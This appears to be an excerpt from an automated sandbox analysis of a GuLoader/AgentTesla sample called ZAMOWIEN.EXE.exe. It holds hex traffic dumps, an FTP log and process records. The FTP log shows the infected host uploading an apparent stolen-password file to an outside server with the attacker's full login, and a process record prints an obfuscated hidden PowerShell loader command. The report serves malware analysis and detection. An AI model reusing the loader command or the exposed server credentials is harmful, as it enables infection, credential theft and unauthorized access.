2024-10-07 07:30:38 UTC	8000	IN	Data Raw: c9 80 42 17 cb 09 27 47 a8 12 ad 93 ac 86 df 2e 8e 8e 47 aa e5 56 b2 43 74 e1 6f 81 b9 11 5c b4 c9 68 d2 0b 5f 13 c8 e0 03 db 01 0b 34 0c 32 ba 00 6b 3c 6f ca 95 92 45 94 44 4a 6a d7 a6 94 d6 0d 00 33 c2 ac d0 05 66 16 fd 28 cf 74 84 56 fa df ae b9 bc 05 bc 5c 24 75 1b e1 5d 12 d0 cf 8c f0 ae 4b 42 56 48 16 5a 18 06 f5 22 cd f8 0c 7b f1 01 07 70 bc 5c 87 10 3f 83 0c a5 dc df ee 77 ea 87 d9 46 c2 41 c5 6d 86 7c 9a 60 56 26 2f df 3c bf b3 cc 08 02 7b 3b 4f 46 c0 f3 22 1d 0b 90 93 6d 6b 73 53 4d a1 33 ab 8a 04 89 d8 a8 56 ff dd b6 ea dc ed 9c be e0 24 bd ca 66 e5 32 c0 dc 9b 85 fe bb f5 33 d4 0d ff 33 d3 aa 37 60 76 71 54 d4 b7 e6 5b df a7 b0 8a a3 a3 63 3a 6f 6b bf 3b b7 49 98 16 be 68 a8 6c 6b fe a8 11 71 3a a5 40 a4 ff 1d f3 ad 7d 87 38 94 84 78 95 02 48 Data Ascii: B'G.GVCto\h_42k<oEDJj3f(tV\$u]KBVHZ"{p\?wFAm\|`V&/<{;OF"mksSM3V$f2337`vqT[c:ok;Ihlkq:@}8xH
2024-10-07 07:30:38 UTC	8000	IN	Data Raw: 80 23 42 24 4b 52 99 63 12 83 3c 61 86 f4 84 0f 69 24 c9 06 dc 23 d1 b6 ff 00 43 20 43 fe 08 81 ec b5 de 84 72 19 4b f4 c8 11 8c 8f 18 18 e9 de 73 c6 c8 19 98 b4 5e 5b 8e c1 26 e0 6d 0b c0 17 4c c0 d5 0a 0f ba 37 a2 70 8b de 42 63 51 e5 1a 62 37 15 98 57 56 80 e5 c8 23 f2 7c f0 76 13 29 e8 11 40 8a 75 79 3c 3b 59 74 9b af 24 e3 68 a1 fc 33 c4 9b 21 d4 f1 85 46 37 cc 31 cc bb a9 e3 51 9f ac 78 a1 d1 8f ae 37 82 ff 56 4c 48 67 eb 6f 92 89 15 7c cc ca 68 d2 f3 51 11 d9 c0 fd d7 03 0b ea 0a 31 ba 38 f4 3e 56 cf 95 6c 49 af 41 6a 60 d7 9e 75 d5 f3 c6 01 c2 ac d3 cb 6e 17 5a 1a c7 74 85 56 88 c9 8c b9 cc a7 9c a9 2a 75 1b 27 c0 03 d0 cf 72 02 a1 4b 62 77 50 16 5a e6 f9 cd 0c da f8 0c 5b 00 08 06 70 11 4f 87 10 3e 3d 4e a2 dc ff cc 6e ea 87 27 b6 cf 41 c5 93 74 Data Ascii: #B$KRc<ai$#C CrKs^[&mL7pBcQb7WV#\|v)@uy<;Yt$h3!F71Qx7VLHgo\|hQ18>VlIAj`unZtV*u'rKbwPZ[pO>=Nn'At
2024-10-07 07:30:38 UTC	8000	IN	Data Raw: de c5 56 e4 f0 31 ac e1 7e 2e 0e 4a a6 e5 22 49 b9 3a e8 2b 13 c1 4a 23 8d df 8b 8f 1d 22 01 4f ce 4a 7d 7e 72 ed 24 62 dd 02 7b db cb 05 0d 9a cf a4 79 ea 46 8d a5 c6 26 9d 6f 48 b6 02 4b 74 a9 9c 92 80 d9 b4 a1 22 be 3a cc cd ad 1d ec ab 25 1e b1 98 c9 26 b1 88 22 37 6d d8 ca be bd 4a 0a dc d4 08 e9 b0 78 93 8a aa 79 48 26 64 7e 04 c6 b9 23 59 1e 8f 8c 23 30 eb 4e 52 e9 c1 12 8e 05 64 ae ec 84 37 66 59 bc 06 e4 ed 0e 4f 00 fe 4a de 4d d4 57 81 12 bf 01 8e 52 1e 4b 0a c1 ef 8d 9e 7e 18 e9 d4 51 e5 c8 19 66 bc 4e 5b f5 b1 26 a4 69 78 e7 17 46 c4 f5 02 0f a9 07 5e 7e aa da 42 9d 49 e7 1a 53 11 15 98 57 a8 7f d2 ef 23 ca 7a 0a 7f 13 29 33 66 31 8a 55 71 c2 32 59 8a e1 e3 33 e3 6c 89 18 3f c4 91 2f 51 f1 85 44 78 a1 30 cc bd 77 e0 53 9f ac 78 a3 d2 8f 8e c9 Data Ascii: V1~.J"I:+J#"OJ}~r$b{yF&oHKt":%&"7mJxyH&d~#Y#0NRd7fYOJMWRK~QfN[&ixF^~BISW#z)3f1Uq2Y3l?/QDx0wSx
2024-10-07 07:30:38 UTC	8000	IN	Data Raw: 6a ee 4a c8 d2 39 5c 71 99 9c f8 5e 43 5a f4 59 83 de 49 64 f7 6c 13 3d d2 57 d5 6e de 4e b0 58 9a b1 c9 93 dc fc aa f9 43 6c 85 4c 1f bc 63 77 d2 ef 93 9a 54 a8 4b 70 f1 b5 20 50 8b 2c 7e ca 8d d0 55 4e b7 c4 c8 b9 0f 15 c2 6b e6 4d 71 0c ce 2b 94 66 de 7c 68 e1 c7 37 46 62 c9 b7 d1 08 d2 5f a9 44 0e be e6 9d 2e ff 8b 02 05 22 f1 a5 af cf e3 5c 94 ad b1 70 a8 ea fb cf a2 1b 72 d1 02 6e a6 dc bf 4b 47 3b 2f 2d 17 c1 25 95 ad de 81 71 13 d1 0f 6e ce 4a 83 72 8d e3 0a 6f e5 71 79 25 ca c2 04 97 cf 5a 4d e1 46 17 5b f0 9a 60 6e bb 98 02 b5 73 9c 9e e0 40 c9 b4 d1 0b a4 3a dd e7 c2 a8 ec ab d1 ee bf 9e f1 e9 bd 8e 22 58 25 d4 ca b4 63 44 05 dc f4 f6 e8 89 72 6d 84 ba 79 50 dc 65 7e 04 c6 bb 2c 59 e0 7d 90 23 aa 35 41 55 e9 3f e0 89 3c 9f a2 eb 84 60 d6 59 bc Data Ascii: jJ9\q^CZYIdl=WnNXClLcwTKp P,~UNkMq+f\|h7Fb_D."\prnKG;/-%qnJroqy%ZMF[`ns@:"X%cDrmyPe~,Y}#5AU?<`Y
2024-10-07 07:30:38 UTC	8000	IN	Data Raw: 40 88 35 5b ad 4b a7 a5 66 26 fe e7 78 a0 ae 9b 17 db e3 98 a8 07 0a 11 ee 24 e6 a8 5e 10 d9 d5 50 29 c2 62 7f fd 04 17 4d db af 0c 42 a8 92 b8 33 89 f6 c9 bb 1e e5 6f ab c6 6f 72 46 48 54 a9 5c 98 c4 bc e5 c7 e9 b9 13 82 8d 45 94 bb de 7a 45 b7 65 a5 54 69 2c 76 5b e5 a4 d4 1c 58 d1 8c 04 9f 7e a9 05 a6 7e d2 c5 48 b1 c7 bf 3b 94 f8 16 d8 66 9a 04 82 6a ee b4 c6 a9 7a 74 27 ea 3e d8 5a bd 56 fd a7 ad ce 49 64 09 9e 04 04 e3 56 d5 6e 20 bc b1 61 76 bf cc 93 8f 84 aa f9 49 6c 85 45 1f 9c 9f 7b db ef 4d 91 42 a8 4b 70 fc 9a 32 70 8b 2c 0d 62 73 d1 66 ba b9 c5 c8 99 29 14 c2 6b 18 bd 76 1a ce d5 66 63 c8 5c 4c e9 c7 37 b8 9d f1 9f d4 08 d2 a1 9d 45 0e 40 e8 a5 97 21 71 fd 7b 96 0f ab ac bd b8 b2 98 d4 de e5 a0 ea f1 31 52 1e 4b 21 0e 6a a6 dd e8 48 47 3b f1 Data Ascii: @5[Kf&x$^P)bMB3oorFHT\EzEeTi,v[X~~H;fjzt'>ZVIdVn avIlE{MBKp2p,bsf)kvfc\L7E@!q{1RK!jHG;
2024-10-07 07:30:38 UTC	8000	IN	Data Raw: 5e c2 5d 85 ba 4a f7 2b a1 f9 e7 91 67 b7 b7 45 6f 91 7d 6a 92 fc 2e 13 b0 5e 7a 9d 87 6b aa c6 ec 9c 97 88 92 bf fe 1f c7 8b 7d 9e 62 d9 e2 c5 a9 61 0f f5 24 e2 61 bb 4d b2 c2 d9 e7 42 84 82 2b b6 a6 f4 ce 8c de 41 f4 d2 d0 b4 af 28 1f 46 fa 54 0e 82 57 78 2b 8d ed 93 03 48 7d 46 a5 e0 27 81 c0 7e 6e 6f 3a 5e e1 eb b9 1a c7 78 03 8b 54 a6 98 ce 73 47 41 88 a4 65 ae 4b ad 7b 6a 25 fe c7 47 9d ae 9b e9 fa de 8a a8 07 f4 3f e4 24 e6 56 ac 14 d8 f5 72 2a c2 62 81 02 33 06 4d db 51 28 90 a8 b2 be cd 87 f7 37 9a 24 ef 6f ab 38 61 58 47 48 aa a5 a8 96 e7 b9 e5 39 e5 44 12 9b 2f 44 94 bb de 77 7d b2 0a 01 54 51 23 88 55 ed 9c f6 84 a6 2e 72 f6 92 76 83 2d 0f 7e c1 ff b2 bf b6 bc c5 98 d7 16 f0 bc ba 04 88 94 e0 49 c8 5e 76 4f 71 d3 33 d8 5a 43 a4 f8 a7 8d 36 47 Data Ascii: ^]J+gEo}j.^zk}ba$aMB+A(FTWx+H}F'~no:^xTsGAeK{j%G?$Vr*b3MQ(7$o8aXGH9D/Dw}TQ#U.rv-~I^vOq3ZC6G
2024-10-07 07:30:38 UTC	8000	IN	Data Raw: 4b 79 cc 29 ca 27 d2 3b 75 7f 63 c6 64 83 9b 4b 57 2f ef 9a 6d e0 f1 be c6 82 d4 2a 6a d8 e3 16 d0 59 00 ad 50 05 7b 1e a4 17 c1 83 10 95 cc 95 d3 f3 98 ab f0 1f a6 25 42 1c 35 1e 64 b1 cb d0 57 54 5e 9f 0c aa ff 69 33 d0 1d 35 bb e9 c8 82 8c d8 7c 97 bd ff cf 97 03 91 1b 37 f2 8b 7e 2d d2 62 52 ba c4 4f e6 51 78 e5 7d cd 7f 48 b6 46 b2 9b 31 2c c3 f0 5e c2 a3 8a b5 4a f6 ce 9d f0 e7 24 75 b7 b7 7f 91 90 55 58 92 fc 2e 33 4e 50 70 9d 41 18 a6 c6 cc 8d 69 84 98 41 d0 11 c7 8b 83 6c 6c e0 d0 dd a9 61 7c 74 25 db 70 45 43 b2 3c f5 e0 42 a4 9b d5 b8 ac dc 61 73 d2 4d 0a fc dd b4 8f 31 e1 47 c3 a4 00 8d 57 86 d9 81 e2 b9 03 4b 7d 46 a5 e0 28 b2 e7 7e 90 63 ce 52 cb e8 99 19 c7 86 02 92 54 a6 98 ce a5 da 40 88 c1 27 64 54 a7 2b 42 3f fe c7 70 02 8e 9c e9 da da Data Ascii: Ky)';ucdKW/m*jYP{%B5dWT^i35\|7~-bROQx}HF1,^J$uUX.3NPpAiAlla\|t%pEC<BasM1GWK}F(~cRT@'dT+B?p
2024-10-07 07:30:38 UTC	8000	IN	Data Raw: 5c d6 a2 5e e6 51 da 25 e9 10 8c 49 38 88 61 77 5f 56 75 ae 26 aa 2e 8a de d5 67 f7 c0 36 65 38 a4 a2 e4 bd 6e 5f 9c 5a b8 e2 2b f2 e4 b9 52 95 fb 83 e2 be 47 33 b4 52 d5 e4 65 45 10 88 df 17 7c ed ad af fa 4a 1e 52 04 c0 6c f6 0c bf 8b ae 3e ba be 13 89 bc 11 6c 1b 54 12 81 49 56 3f 91 f7 8b e0 4d 0a 1d 18 19 9a 73 6c d4 2d ad 8a ed a2 ef d5 5f 67 c4 4b 8d 9a 02 cb 07 d8 3b 49 72 9d c8 6b 7d 97 b5 5b de e1 a1 69 3d 95 b8 38 83 9e a5 6a d8 e9 16 d2 5b 00 73 5d 00 7b 71 72 06 dc 89 9e b3 ed 95 eb c5 ea e3 ef e1 db 11 58 34 9c 14 c6 9b 30 de 5e 54 5e 9d 0a aa 8d 13 14 df 6d 3d b2 e9 c8 88 5a c2 45 b2 b7 c6 d8 69 0f 95 e5 49 5c 94 80 51 a9 de 3f 3e 9f 6f 96 79 62 e5 55 38 11 e7 b0 b8 b6 60 3c 10 d7 d8 f0 c2 5d 8e 80 fc 09 cf 6e 22 f7 04 65 b7 49 72 73 91 92 Data Ascii: \^Q%I8aw_Vu&.g6e8n_Z+RG3ReE\|JRl>lTIV?Msl-_gK;Irk}[i=8j[s]{qrX40^T^m=ZEiI\Q?>oybU8`<]n"eIrs
2024-10-07 07:30:38 UTC	8000	IN	Data Raw: d5 f2 29 72 cb b0 ed a3 b0 2b 40 91 26 63 d9 3f 71 f9 d0 9f 65 7e cd f6 9f 1b 65 f9 db c7 81 cb 84 ac b3 3e 3a 29 fe 68 7e 17 a9 44 57 97 37 69 37 50 02 b8 8c 52 00 17 2a e6 4d e0 80 82 2b 42 3d ac 7c 53 02 6b ca 19 3b 6f cf e2 05 87 cf 46 ed f5 39 7c 5c 59 da fd d4 82 8a d0 7d cb 94 5c 31 3d 56 54 e9 6d 7a e6 94 f7 7e a0 fd c1 23 32 de fc 15 c5 5c 1c 5b a4 27 a4 cc 21 c5 91 f2 10 8a bd 1e 25 61 89 59 6b 69 50 2a ac d0 f4 d1 fa 99 8b a8 aa 16 ec 88 5c 9a 9c 74 77 ad 50 90 42 d5 fe eb d6 0b 99 f2 89 34 27 40 33 cc 8a f2 e6 15 93 06 8b df 72 86 49 ad a9 9f 3b 02 52 0e 3e 9c f0 0a 41 79 a3 39 c9 a0 34 a2 ba 9f 4a 0a 54 ec 87 6a fc 4d 3a d3 e4 37 22 65 16 e6 13 61 7f 08 e4 d3 a1 88 13 c1 98 d4 30 51 3a 47 8c c2 dc c6 0d d8 54 06 7e 9d ce 95 8f 90 b5 a5 2c e8 Data Ascii: )r+@&c?qe~e>:)h~DW7i7PRM+B=\|Sk;oF9\|\Y}\1=VTmz~#2\['!%aYkiP\twPB4'@3rI;R>Ay94JTjM:7"ea0Q:GT~,

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 7, 2024 09:30:41.150233984 CEST	21	49973	185.146.87.128	192.168.2.7	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Oct 7, 2024 09:30:41.150448084 CEST	49973	21	192.168.2.7	185.146.87.128	USER AdminFTP@rusticpensiune.ro
Oct 7, 2024 09:30:41.360739946 CEST	21	49973	185.146.87.128	192.168.2.7	331 User AdminFTP@rusticpensiune.ro OK. Password required
Oct 7, 2024 09:30:41.360883951 CEST	49973	21	192.168.2.7	185.146.87.128	PASS hr,d@KUwa5llI%RNL^J]g%8I;!;_Ne#G1h~lE!86DAAD6#iLm$x)r+e1z$p+_Q,4_(f!};B?vD!IG?NqT[zOHNr6_nww[S]V?MlcYSt_QO
Oct 7, 2024 09:30:41.620598078 CEST	21	49973	185.146.87.128	192.168.2.7	230 OK. Current restricted directory is /
Oct 7, 2024 09:30:41.831144094 CEST	21	49973	185.146.87.128	192.168.2.7	504 Unknown command
Oct 7, 2024 09:30:41.831824064 CEST	49973	21	192.168.2.7	185.146.87.128	PWD
Oct 7, 2024 09:30:42.042131901 CEST	21	49973	185.146.87.128	192.168.2.7	257 "/" is your current location
Oct 7, 2024 09:30:42.042412043 CEST	49973	21	192.168.2.7	185.146.87.128	TYPE I
Oct 7, 2024 09:30:42.252959967 CEST	21	49973	185.146.87.128	192.168.2.7	200 TYPE is now 8-bit binary
Oct 7, 2024 09:30:42.253185987 CEST	49973	21	192.168.2.7	185.146.87.128	PASV
Oct 7, 2024 09:30:42.463851929 CEST	21	49973	185.146.87.128	192.168.2.7	227 Entering Passive Mode (185,146,87,128,209,155)
Oct 7, 2024 09:30:42.473706961 CEST	49973	21	192.168.2.7	185.146.87.128	STOR PW_user-468325_2024_10_07_04_35_19.html
Oct 7, 2024 09:30:43.064012051 CEST	21	49973	185.146.87.128	192.168.2.7	150 Accepted data connection
Oct 7, 2024 09:30:43.275490999 CEST	21	49973	185.146.87.128	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.211 seconds (measured here), 1.49 Kbytes per second

Target ID:	0
Start time:	03:29:42
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"
Imagebase:	0x400000
File size:	456'011 bytes
MD5 hash:	6B63BDC24B2E1162073514F7934A4F9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	03:29:43
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"
Imagebase:	0x5d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1686392459.000000000C60C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	03:29:43
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	04:35:03
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\msiexec.exe"
Imagebase:	0x7f0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false